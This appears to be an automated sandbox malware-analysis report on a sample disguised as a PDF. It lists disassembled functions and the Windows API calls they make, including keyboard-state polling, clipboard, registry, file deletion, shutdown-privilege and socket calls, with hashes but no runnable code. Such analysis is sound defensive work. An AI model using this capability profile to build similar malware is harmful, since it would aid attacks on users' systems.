                                                                            • Part of subcall function 00B610A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B60038,?,?), ref: 00B610BC
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B60737
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B607D6
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B6086E
                                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B60AAD
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00B60ABA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 1240663315-0
                                                                          • Opcode ID: cf30bd33370a501c9f67e54bf0c8e853bf11781e7c64cd99cbb56246734355a2
                                                                          • Instruction ID: 4e42b0f4e9680103ec59ecc9dd1384e1e1c3622b0eaff45c989d6beb9dfba27d
                                                                          • Opcode Fuzzy Hash: cf30bd33370a501c9f67e54bf0c8e853bf11781e7c64cd99cbb56246734355a2
                                                                          • Instruction Fuzzy Hash: 27E14C31214300AFCB14EF69C991E2BBBE4EF89714B0489ADF449DB2A2DA34ED01CB51
                                                                          Function 00B40219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 00B40241
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00B402C2
                                                                          • GetKeyState.USER32(000000A0), ref: 00B402DD
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00B402F7
                                                                          • GetKeyState.USER32(000000A1), ref: 00B4030C
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00B40324
                                                                          • GetKeyState.USER32(00000011), ref: 00B40336
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00B4034E
                                                                          • GetKeyState.USER32(00000012), ref: 00B40360
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00B40378
                                                                          • GetKeyState.USER32(0000005B), ref: 00B4038A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: 38ad4801283ba3f87ce408c8cdf687482f76c4e970ce21b9520a8930396762a7
                                                                          • Instruction ID: dc7781b43d97bc336f251fcb0941193f8b2d7bc77d067644f499a73ce5d216f7
                                                                          • Opcode Fuzzy Hash: 38ad4801283ba3f87ce408c8cdf687482f76c4e970ce21b9520a8930396762a7
                                                                          • Instruction Fuzzy Hash: 894186245247CA6AFF31AA6494083B5BEE0EB15340F0840DEDBC6471C2DBF45EC4AB96
                                                                          Function 00B586D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          • CoInitialize.OLE32 ref: 00B58718
                                                                          • CoUninitialize.OLE32 ref: 00B58723
                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00B72BEC,?), ref: 00B58783
                                                                          • IIDFromString.OLE32(?,?), ref: 00B587F6
                                                                          • VariantInit.OLEAUT32(?), ref: 00B58890
                                                                          • VariantClear.OLEAUT32(?), ref: 00B588F1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                          • API String ID: 834269672-1287834457
                                                                          • Opcode ID: 96302fc8b92a4ba7c494a486ce0e896fe7e65b17c070d038a42212a25e99780f
                                                                          • Instruction ID: eebf28eb56807c07eec2e675ff71ffe0bf76c60aa337a62a73f8ace6d6b56754
                                                                          • Opcode Fuzzy Hash: 96302fc8b92a4ba7c494a486ce0e896fe7e65b17c070d038a42212a25e99780f
                                                                          • Instruction Fuzzy Hash: FC61AE70608311AFD710DF24D985B6BBBE4EF48715F1048D9F985AB2A1DB70ED48CB92
                                                                          Function 00B54458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                          • String ID:
                                                                          • API String ID: 1737998785-0
                                                                          • Opcode ID: e21b9910a31993ffcad6f8ddf9062de7445f3a27b67b31bc8db5ffa971775d61
                                                                          • Instruction ID: 3a130e30acaca082cc651d331f3ec104e600c9f5b4163d706c59309547261037
                                                                          • Opcode Fuzzy Hash: e21b9910a31993ffcad6f8ddf9062de7445f3a27b67b31bc8db5ffa971775d61
                                                                          • Instruction Fuzzy Hash: FD218B75200211AFDB10AF24EC49B7A7BA8EF54715F1080AAF906DB2B1DFB8AD01CB54
                                                                          Function 00B43A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AE48A1,?,?,00AE37C0,?), ref: 00AE48CE
                                                                            • Part of subcall function 00B44CD3: GetFileAttributesW.KERNEL32(?,00B43947), ref: 00B44CD4
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00B43ADF
                                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00B43B87
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00B43B9A
                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B43BB7
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B43BD9
                                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00B43BF5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                          • String ID: \*.*
                                                                          • API String ID: 4002782344-1173974218
                                                                          • Opcode ID: 135461ecb068cf73a7424485f254d7db5e209eb8d37949cb9b80a65f6530af0a
                                                                          • Instruction ID: 0811391f1ac8d0b6852d6bdeb1bbe0840d0e1c7f47135dce6176a8d62bb77d79
                                                                          • Opcode Fuzzy Hash: 135461ecb068cf73a7424485f254d7db5e209eb8d37949cb9b80a65f6530af0a
                                                                          • Instruction Fuzzy Hash: B95181318052899ACF05EBA1DE929FDB7F9EF14300F6841A9E44177092DF716F09DBA0
                                                                          Function 00B4F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B4F6AB
                                                                          • Sleep.KERNEL32(0000000A), ref: 00B4F6DB
                                                                          • _wcscmp.LIBCMT ref: 00B4F6EF
                                                                          • _wcscmp.LIBCMT ref: 00B4F70A
                                                                          • FindNextFileW.KERNEL32(?,?), ref: 00B4F7A8
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4F7BE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                          • String ID: *.*
                                                                          • API String ID: 713712311-438819550
                                                                          • Opcode ID: 3f3156cf904a33c84f93a30b47f2231aa9933d3801849b5e3b6b3d2ee3ec2efe
                                                                          • Instruction ID: e6555ed2c742430b362e2fb6d2f3cd140ae1ed92e01d009a7dbb84e0cdc8647b
                                                                          • Opcode Fuzzy Hash: 3f3156cf904a33c84f93a30b47f2231aa9933d3801849b5e3b6b3d2ee3ec2efe
                                                                          • Instruction Fuzzy Hash: 59417C7190021AABDF11DF64CC99AFEBBF4FF05310F1445A6E815A31A0EB349E44DBA0
                                                                          Function 00AF4140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                          • API String ID: 0-1546025612
                                                                          • Opcode ID: ba1ddd1f58d267ec2022cc5cdb8f77956ca1d82a07f182cf0c6251b2210d65d1
                                                                          • Instruction ID: 525e2fb9a3f6463f1f92c95c488aff14dc5e759b83c954168e010f0aad0b15f0
                                                                          • Opcode Fuzzy Hash: ba1ddd1f58d267ec2022cc5cdb8f77956ca1d82a07f182cf0c6251b2210d65d1
                                                                          • Instruction Fuzzy Hash: 78A28270E0422E8BDF24DF98D9907BEB7B1FB58314F1481A9E959A7280DB709E81CF54
                                                                          Function 00AF58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 819e5c002154a14e35f59f58ce69fd2797860fdb7b4450f0871abfcbca63d3e2
                                                                          • Instruction ID: d79fe40681273bbeb39ac30e2527f74e4f57d13c41bf1b2c49976e6701bc6508
                                                                          • Opcode Fuzzy Hash: 819e5c002154a14e35f59f58ce69fd2797860fdb7b4450f0871abfcbca63d3e2
                                                                          • Instruction Fuzzy Hash: A612A970E00609DFDF14DFA5DA81AAEB7F5FF48300F2086A9E546A7291EB35AD11CB50
                                                                          Function 00B4545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B38CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B38D0D
                                                                            • Part of subcall function 00B38CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B38D3A
                                                                            • Part of subcall function 00B38CC3: GetLastError.KERNEL32 ref: 00B38D47
                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00B4549B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                          • String ID: $@$SeShutdownPrivilege
                                                                          • API String ID: 2234035333-194228
                                                                          • Opcode ID: d2f2e1aff8325b3be8c7fa197043a6930212bf7edaac451a5c02a22d9c4f8032
                                                                          • Instruction ID: 4ae29cfe83678b64cb6dd8b6e68898145f027ff2f9295f78782b461f5383bc57
                                                                          • Opcode Fuzzy Hash: d2f2e1aff8325b3be8c7fa197043a6930212bf7edaac451a5c02a22d9c4f8032
                                                                          • Instruction Fuzzy Hash: 67014771655F026BF7385674EC8ABBA72D8EB00752F3400B0FC07DA2D7DA940E80A190
                                                                          Function 00B56596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B565EF
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B565FE
                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00B5661A
                                                                          • listen.WSOCK32(00000000,00000005), ref: 00B56629
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B56643
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00B56657
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                                          • String ID:
                                                                          • API String ID: 1279440585-0
                                                                          • Opcode ID: d14097267aae753fbbd42e05797c5c65be832c7a236d5047661200c769892307
                                                                          • Instruction ID: 7e1871b0021f749f2f6a9e987ca69a3b63ce8408ca8cb3a903243f336d9fc4be
                                                                          • Opcode Fuzzy Hash: d14097267aae753fbbd42e05797c5c65be832c7a236d5047661200c769892307
                                                                          • Instruction Fuzzy Hash: 04219C30600205AFCB10AF24D985B7EB7E9EF48321F2481A9E95AE73E1CB74AD058B51
                                                                          Function 00AF5680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B00FF6: std::exception::exception.LIBCMT ref: 00B0102C
                                                                            • Part of subcall function 00B00FF6: __CxxThrowException@8.LIBCMT ref: 00B01041
                                                                          • _memmove.LIBCMT ref: 00B3062F
                                                                          • _memmove.LIBCMT ref: 00B30744
                                                                          • _memmove.LIBCMT ref: 00B307EB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 1300846289-0
                                                                          • Opcode ID: e86e3172e38ab90f40b0f4dbdd462e50f8c60621e5c0c7d8dace0d0fc3878923
                                                                          • Instruction ID: 46339b1878b10055f329f3c01235c93c025f4dd2eef784f3a78df14d7d220eae
                                                                          • Opcode Fuzzy Hash: e86e3172e38ab90f40b0f4dbdd462e50f8c60621e5c0c7d8dace0d0fc3878923
                                                                          • Instruction Fuzzy Hash: 48029F70E10209DBDF04EF69D991ABEBBF5EF44340F2480A9E906DB295EB31D950CB91
                                                                          Function 00AE1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00AE19FA
                                                                          • GetSysColor.USER32(0000000F), ref: 00AE1A4E
                                                                          • SetBkColor.GDI32(?,00000000), ref: 00AE1A61
                                                                            • Part of subcall function 00AE1290: DefDlgProcW.USER32(?,00000020,?), ref: 00AE12D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ColorProc$LongWindow
                                                                          • String ID:
                                                                          • API String ID: 3744519093-0
                                                                          • Opcode ID: 61f929ac3844103562d9440a3c3306744ccecf317f3f151b7ee56c85beb677ef
                                                                          • Instruction ID: c8a75b7f7fddd88aeafd32650ffa1e728f3aece99a85d87d8beeae0e8fd98b7f
                                                                          • Opcode Fuzzy Hash: 61f929ac3844103562d9440a3c3306744ccecf317f3f151b7ee56c85beb677ef
                                                                          • Instruction Fuzzy Hash: 2CA16BB11055E4BED638AB2B8C65DBF3AEDDB463C1B54016AF402D7192CE388D4192B2
                                                                          Function 00B56A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B580A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B580CB
                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B56AB1
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B56ADA
                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00B56B13
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B56B20
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00B56B34
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 99427753-0
                                                                          • Opcode ID: 669417a18f2e989d4bd0d93574cb89b41faeb009076cde0bb772baaa4cae77a5
                                                                          • Instruction ID: a9ef05d4570496d82386d5a1bfe76f49563356f6ea61d8d95af4c2ee85584652
                                                                          • Opcode Fuzzy Hash: 669417a18f2e989d4bd0d93574cb89b41faeb009076cde0bb772baaa4cae77a5
                                                                          • Instruction Fuzzy Hash: 6F419175600310AFEB10AF25DD86F7E77E9DF48710F448098F91AAB2D2DA749D018791
                                                                          Function 00B655FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                          • String ID:
                                                                          • API String ID: 292994002-0
                                                                          • Opcode ID: 26043a18fe4214e4ea268eae4cba57a753112712decaed2278132f55dc0570dc
                                                                          • Instruction ID: f78980bf824e7691dfb7d4d9051519ad65635514184838bf8d2658ae7a7ecf73
                                                                          • Opcode Fuzzy Hash: 26043a18fe4214e4ea268eae4cba57a753112712decaed2278132f55dc0570dc
                                                                          • Instruction Fuzzy Hash: 5F11BF72700A126FE7211F26EC44A2BBBD8FF54761F808079E806D7281CB789D12CAA5
                                                                          Function 00B5C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00B21D88,?), ref: 00B5C312
                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B5C324
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
